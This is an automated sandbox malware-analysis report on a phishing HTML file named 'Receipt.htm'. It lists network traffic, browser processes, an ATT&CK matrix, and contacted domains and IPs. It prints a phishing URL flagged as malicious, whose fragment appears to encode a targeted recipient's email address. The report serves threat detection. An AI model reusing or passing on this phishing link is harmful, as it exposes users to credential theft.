Source: unknown	Network traffic detected: HTTP traffic on port 63794 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63897 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63981 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64024
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64023
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64025
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64028
Source: unknown	Network traffic detected: HTTP traffic on port 63654 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64027
Source: unknown	Network traffic detected: HTTP traffic on port 49739 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64029
Source: unknown	Network traffic detected: HTTP traffic on port 63946 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64040
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64042
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64041
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64044
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64043
Source: unknown	Network traffic detected: HTTP traffic on port 64037 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63737 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64035
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64034
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64037
Source: unknown	Network traffic detected: HTTP traffic on port 63808 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64036
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64039
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64038
Source: unknown	Network traffic detected: HTTP traffic on port 64082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64051
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64050
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64052
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64054
Source: unknown	Network traffic detected: HTTP traffic on port 64015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63853 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64046
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64045
Source: unknown	Network traffic detected: HTTP traffic on port 49750 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64048
Source: unknown	Network traffic detected: HTTP traffic on port 63782 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64047
Source: unknown	Network traffic detected: HTTP traffic on port 64060 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 64049
Source: unknown	Network traffic detected: HTTP traffic on port 63944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63864 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63929
Source: unknown	Network traffic detected: HTTP traffic on port 64078 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63909 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63922
Source: unknown	Network traffic detected: HTTP traffic on port 64032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63921
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63926
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63925
Source: unknown	Network traffic detected: HTTP traffic on port 63829 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63928
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63927
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63920
Source: unknown	Network traffic detected: HTTP traffic on port 63991 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 63830 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63933
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63932
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63935
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63934
Source: unknown	Network traffic detected: HTTP traffic on port 63876 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63937
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63936
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63939
Source: unknown	Network traffic detected: HTTP traffic on port 49806 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63938
Source: unknown	Network traffic detected: HTTP traffic on port 63784 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63931
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 63930

Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49750 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 184.28.90.27:443 -> 192.168.2.4:49752 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:49772 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 13.107.253.45:443 -> 192.168.2.4:63806 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 20.12.23.50:443 -> 192.168.2.4:63825 version: TLS 1.2

System Summary

HTML document with suspicious name

Source: Name includes: Receipt.htm

Initial sample: receipt

Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\sets.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\manifest.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\LICENSE	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\_metadata\	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\_metadata\verified_contents.json	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	File created: C:\Windows\SystemTemp\chrome_PuffinComponentUnpacker_BeginUnzipping5888_459419989\manifest.fingerprint	Jump to behavior

Source: classification engine

Classification label: mal60.phis.evad.winHTM@33/202@76/23

Source: unknown	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "C:\Users\user\Desktop\Receipt.htm"
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6092 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2552 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6092 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5608 --field-trial-handle=2196,i,17035854195700752652,17816157160969327340,262144 /prefetch:8	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Data Obfuscation

HTML file submission requesting Cloudflare captcha challenge

Source: https://rpbr.ithbetoxi.com/wtqllHS/#O#cG9ydGxhbmRzYWxlc0BzdGd1c2EuY29t

HTTP Parser: https://rpbr.ithbetoxi.com/wtqllHS/#O#cG9ydGxhbmRzYWxlc0BzdGd1c2EuY29t

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	1 Scripting	Valid Accounts	Windows Management Instrumentation	1 Scripting	1 Process Injection	1 Masquerading	OS Credential Dumping	System Service Discovery	Remote Services	Data from Local System	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	1 Process Injection	LSASS Memory	Application Window Discovery	Remote Desktop Protocol	Data from Removable Media	4 Non-Application Layer Protocol	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	Query Registry	SMB/Windows Admin Shares	Data from Network Shared Drive	5 Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	Binary Padding	NTDS	System Network Configuration Discovery	Distributed Component Object Model	Input Capture	3 Ingress Tool Transfer	Traffic Duplication	Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
https://wieistmeineip.de	0%	URL Reputation	safe
https://mercadoshops.com.co	0%	URL Reputation	safe
https://gliadomain.com	0%	URL Reputation	safe
https://poalim.xyz	0%	URL Reputation	safe
https://mercadolivre.com	0%	URL Reputation	safe
https://reshim.org	0%	URL Reputation	safe
https://nourishingpursuits.com	0%	URL Reputation	safe
https://medonet.pl	0%	URL Reputation	safe
https://unotv.com	0%	URL Reputation	safe
https://mercadoshops.com.br	0%	URL Reputation	safe
https://zdrowietvn.pl	0%	URL Reputation	safe
https://johndeere.com	0%	URL Reputation	safe
https://songstats.com	0%	URL Reputation	safe
https://baomoi.com	0%	URL Reputation	safe
https://supereva.it	0%	URL Reputation	safe
https://elfinancierocr.com	0%	URL Reputation	safe
https://bolasport.com	0%	URL Reputation	safe
https://rws1nvtvt.com	0%	URL Reputation	safe
https://desimartini.com	0%	URL Reputation	safe
https://hearty.app	0%	URL Reputation	safe
https://hearty.gift	0%	URL Reputation	safe
https://mercadoshops.com	0%	URL Reputation	safe
https://heartymail.com	0%	URL Reputation	safe
https://p106.net	0%	URL Reputation	safe
https://radio2.be	0%	URL Reputation	safe
https://finn.no	0%	URL Reputation	safe
https://hc1.com	0%	URL Reputation	safe
https://kompas.tv	0%	URL Reputation	safe
https://mystudentdashboard.com	0%	URL Reputation	safe
https://songshare.com	0%	URL Reputation	safe
https://mercadopago.com.mx	0%	URL Reputation	safe
https://p24.hu	0%	URL Reputation	safe
https://talkdeskqaid.com	0%	URL Reputation	safe
https://mercadopago.com.pe	0%	URL Reputation	safe
https://cardsayings.net	0%	URL Reputation	safe
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	0%	URL Reputation	safe
https://mightytext.net	0%	URL Reputation	safe
https://pudelek.pl	0%	URL Reputation	safe
https://hazipatika.com	0%	URL Reputation	safe
https://joyreactor.com	0%	URL Reputation	safe
https://cookreactor.com	0%	URL Reputation	safe
https://wildixin.com	0%	URL Reputation	safe
https://eworkbookcloud.com	0%	URL Reputation	safe
https://cognitiveai.ru	0%	URL Reputation	safe
https://nacion.com	0%	URL Reputation	safe
https://chennien.com	0%	URL Reputation	safe
https://drimer.travel	0%	URL Reputation	safe
https://mercadopago.cl	0%	URL Reputation	safe
https://talkdeskstgid.com	0%	URL Reputation	safe
https://bonvivir.com	0%	URL Reputation	safe
https://carcostadvisor.be	0%	URL Reputation	safe
https://salemovetravel.com	0%	URL Reputation	safe
https://sapo.io	0%	URL Reputation	safe
https://wpext.pl	0%	URL Reputation	safe
https://welt.de	0%	URL Reputation	safe
https://poalim.site	0%	URL Reputation	safe
https://drimer.io	0%	URL Reputation	safe
https://infoedgeindia.com	0%	URL Reputation	safe
https://blackrockadvisorelite.it	0%	URL Reputation	safe
https://cognitive-ai.ru	0%	URL Reputation	safe
https://cafemedia.com	0%	URL Reputation	safe
https://graziadaily.co.uk	0%	URL Reputation	safe
https://thirdspace.org.au	0%	URL Reputation	safe
https://mercadoshops.com.ar	0%	URL Reputation	safe
https://smpn106jkt.sch.id	0%	URL Reputation	safe
https://elpais.uy	0%	URL Reputation	safe
https://landyrev.com	0%	URL Reputation	safe
https://commentcamarche.com	0%	URL Reputation	safe
https://tucarro.com.ve	0%	URL Reputation	safe
https://rws3nvtvt.com	0%	URL Reputation	safe
https://eleconomista.net	0%	URL Reputation	safe
https://clmbtech.com	0%	URL Reputation	safe
https://standardsandpraiserepurpose.com	0%	URL Reputation	safe
https://salemovefinancial.com	0%	URL Reputation	safe
https://mercadopago.com.br	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
a.nel.cloudflare.com	35.190.80.1	true	false	unknown
sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	172.67.187.119	true	false	unknown
d22rbd88eku03j.cloudfront.net	18.245.86.44	true	false	unknown
d2uyh1ncuzni57.cloudfront.net	18.244.18.13	true	false	unknown
s-part-0017.t-0009.fb-t-msedge.net	13.107.253.45	true	false	unknown
s-part-0017.t-0009.t-msedge.net	13.107.246.45	true	false	unknown
teacurl.com	69.49.245.172	true	false	unknown
tag.getamigo.io	35.186.195.238	true	false	unknown
rpbr.ithbetoxi.com	188.114.96.3	true	true	unknown
async-px.dynamicyield.com	13.35.58.72	true	false	unknown
csp38.domdog.io	104.22.50.233	true	false	unknown
d1nna0ec3lv40t.cloudfront.net	18.66.122.33	true	false	unknown
code.jquery.com	151.101.194.137	true	false	unknown
cdnjs.cloudflare.com	104.17.24.14	true	false	unknown
challenges.cloudflare.com	104.18.94.41	true	false	unknown
www.google.com	142.250.186.164	true	false	unknown
st.dynamicyield.com	unknown	unknown	false	unknown
s2.go-mpulse.net	unknown	unknown	false	unknown
media.kohlsimg.com	unknown	unknown	false	unknown
assetcert.kohls.com	unknown	unknown	false	unknown
cdn.dynamicyield.com	unknown	unknown	false	unknown
rcom.dynamicyield.com	unknown	unknown	false	unknown
c.go-mpulse.net	unknown	unknown	false	unknown
684dd32a.akstat.io	unknown	unknown	false	unknown
www.kohls.com	unknown	unknown	false	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://tag.getamigo.io/plugin/setResource/2316faafcbc80fe4f50d/	false		unknown
https://rpbr.ithbetoxi.com/wtqllHS/	true		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/flow/ov1/87538823:1730297856:oBwGVF8aHz7-DDxOT_QFbYFX36Y1gtPfSuG-jhTbWFg/8dac4dededb74654/PfObaQesvT7A2EWQGdm61TroT3kSUKiEz7Y_CiOUW88-1730300735-1.1.1.1-qKhEgUlBXOY7wv6GqGx1zxf7gW6G6B7NA82Ime_vB5lAzADjhlb9PX07Rq671hhT	false		unknown
https://sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com/jnstrssjpuxhbzrroeqttnijOxtCCQUhFPCWFDQZVLPWDEPANBVGIELYPIKPCLODVOA	false		unknown
https://www.kohls.com/	false		unknown
https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/orchestrate/chl_api/v1?ray=8dac4dededb74654&lang=auto	false		unknown
https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.js	false	URL Reputation: safe	unknown
https://a.nel.cloudflare.com/report/v4?s=9tnKQcu8aFvvmKIn3VWKU%2F4Ykhbr%2FmnLHkB1XMQxqGDRL81by%2FetytXb8fQZQnfWDawuhROdpen8ayBUEZ%2BkR3mgBuoFOhk4QaXc5AyIkyIAu0ywx0a97b4x3JGEtA%3D%3D	false		unknown
https://st.dynamicyield.com/st?sec=8776374&inHead=true&id=0&jsession=&ref=https%3A%2F%2Frpbr.ithbetoxi.com%2F&scriptVersion=2.43.0&dyid_server=Dynamic%20Yield&ctx=%7B%22type%22%3A%22HOMEPAGE%22%7D	false		unknown
https://rcom.dynamicyield.com/userAffinities?limit=10&sec=8776374&uid=5152118215960316765	false		unknown
https://tag.getamigo.io/plugin/getResource/76a695a61b6737f22046/	false		unknown
https://cdn.dynamicyield.com/api/8776374/api_dynamic.js	false		unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://wieistmeineip.de	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.co	sets.json.0.dr	false	URL Reputation: safe	unknown
https://gliadomain.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://poalim.xyz	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadolivre.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://reshim.org	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nourishingpursuits.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://medonet.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://unotv.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.br	sets.json.0.dr	false	URL Reputation: safe	unknown
https://joyreactor.cc	sets.json.0.dr	false		unknown
https://zdrowietvn.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://johndeere.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://songstats.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://baomoi.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://supereva.it	sets.json.0.dr	false	URL Reputation: safe	unknown
https://elfinancierocr.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://bolasport.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://rws1nvtvt.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://desimartini.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hearty.app	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hearty.gift	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://heartymail.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nlc.hu	sets.json.0.dr	false		unknown
https://p106.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://radio2.be	sets.json.0.dr	false	URL Reputation: safe	unknown
https://finn.no	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hc1.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://kompas.tv	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mystudentdashboard.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://songshare.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://smaker.pl	sets.json.0.dr	false		unknown
https://mercadopago.com.mx	sets.json.0.dr	false	URL Reputation: safe	unknown
https://p24.hu	sets.json.0.dr	false	URL Reputation: safe	unknown
https://talkdeskqaid.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://24.hu	sets.json.0.dr	false		unknown
https://mercadopago.com.pe	sets.json.0.dr	false	URL Reputation: safe	unknown
https://tag.getamigo.io	chromecache_184.2.dr, chromecache_189.2.dr	false		unknown
https://cardsayings.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://text.com	sets.json.0.dr	false		unknown
https://mightytext.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://pudelek.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://hazipatika.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://joyreactor.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cookreactor.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://wildixin.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://eworkbookcloud.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cognitiveai.ru	sets.json.0.dr	false	URL Reputation: safe	unknown
https://nacion.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://chennien.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://drimer.travel	sets.json.0.dr	false	URL Reputation: safe	unknown
https://deccoria.pl	sets.json.0.dr	false		unknown
https://github.com/kriskowal/q/blob/v1/LICENSE	chromecache_276.2.dr, chromecache_277.2.dr	false		unknown
https://mercadopago.cl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://talkdeskstgid.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://naukri.com	sets.json.0.dr	false		unknown
https://interia.pl	sets.json.0.dr	false		unknown
https://bonvivir.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://carcostadvisor.be	sets.json.0.dr	false	URL Reputation: safe	unknown
https://salemovetravel.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://sapo.io	sets.json.0.dr	false	URL Reputation: safe	unknown
https://wpext.pl	sets.json.0.dr	false	URL Reputation: safe	unknown
https://welt.de	sets.json.0.dr	false	URL Reputation: safe	unknown
https://poalim.site	sets.json.0.dr	false	URL Reputation: safe	unknown
https://drimer.io	sets.json.0.dr	false	URL Reputation: safe	unknown
https://infoedgeindia.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://blackrockadvisorelite.it	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cognitive-ai.ru	sets.json.0.dr	false	URL Reputation: safe	unknown
https://cafemedia.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://graziadaily.co.uk	sets.json.0.dr	false	URL Reputation: safe	unknown
https://thirdspace.org.au	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadoshops.com.ar	sets.json.0.dr	false	URL Reputation: safe	unknown
https://smpn106jkt.sch.id	sets.json.0.dr	false	URL Reputation: safe	unknown
https://elpais.uy	sets.json.0.dr	false	URL Reputation: safe	unknown
https://landyrev.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://the42.ie	sets.json.0.dr	false		unknown
https://commentcamarche.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://tucarro.com.ve	sets.json.0.dr	false	URL Reputation: safe	unknown
https://rws3nvtvt.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://eleconomista.net	sets.json.0.dr	false	URL Reputation: safe	unknown
https://helpdesk.com	sets.json.0.dr	false		unknown
https://mercadolivre.com.br	sets.json.0.dr	false		unknown
https://clmbtech.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://standardsandpraiserepurpose.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://07c225f3.online	sets.json.0.dr	false		unknown
https://salemovefinancial.com	sets.json.0.dr	false	URL Reputation: safe	unknown
https://mercadopago.com.br	sets.json.0.dr	false	URL Reputation: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
18.245.86.44	d22rbd88eku03j.cloudfront.net	United States	16509	AMAZON-02US	false
104.18.94.41	challenges.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
151.101.130.137	unknown	United States	54113	FASTLYUS	false
13.35.58.129	unknown	United States	16509	AMAZON-02US	false
18.66.122.78	unknown	United States	3	MIT-GATEWAYSUS	false
172.67.187.119	sjwa7r8libqlzy5hjynwjd0i2xjxrhu0x9hv1k83ow3mvnpyhtkv.ticurson.com	United States	13335	CLOUDFLARENETUS	false
18.66.122.33	d1nna0ec3lv40t.cloudfront.net	United States	3	MIT-GATEWAYSUS	false
151.101.194.137	code.jquery.com	United States	54113	FASTLYUS	false
35.190.80.1	a.nel.cloudflare.com	United States	15169	GOOGLEUS	false
104.22.50.233	csp38.domdog.io	United States	13335	CLOUDFLARENETUS	false
104.17.24.14	cdnjs.cloudflare.com	United States	13335	CLOUDFLARENETUS	false
18.244.18.13	d2uyh1ncuzni57.cloudfront.net	United States	16509	AMAZON-02US	false
35.186.195.238	tag.getamigo.io	United States	15169	GOOGLEUS	false
69.49.245.172	teacurl.com	United States	46606	UNIFIEDLAYER-AS-1US	false
104.18.95.41	unknown	United States	13335	CLOUDFLARENETUS	false
239.255.255.250	unknown	Reserved	unknown	unknown	false
188.114.96.3	rpbr.ithbetoxi.com	European Union	13335	CLOUDFLARENETUS	true
142.250.186.164	www.google.com	United States	15169	GOOGLEUS	false
13.35.58.72	async-px.dynamicyield.com	United States	16509	AMAZON-02US	false
18.245.86.57	unknown	United States	16509	AMAZON-02US	false
104.17.25.14	unknown	United States	13335	CLOUDFLARENETUS	false

Private

IP
192.168.2.4
192.168.2.6

General Information

Joe Sandbox version:	41.0.0 Charoite
Analysis ID:	1545491
Start date and time:	2024-10-30 16:04:26 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 6m 12s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultwindowshtmlcookbook.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	9
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
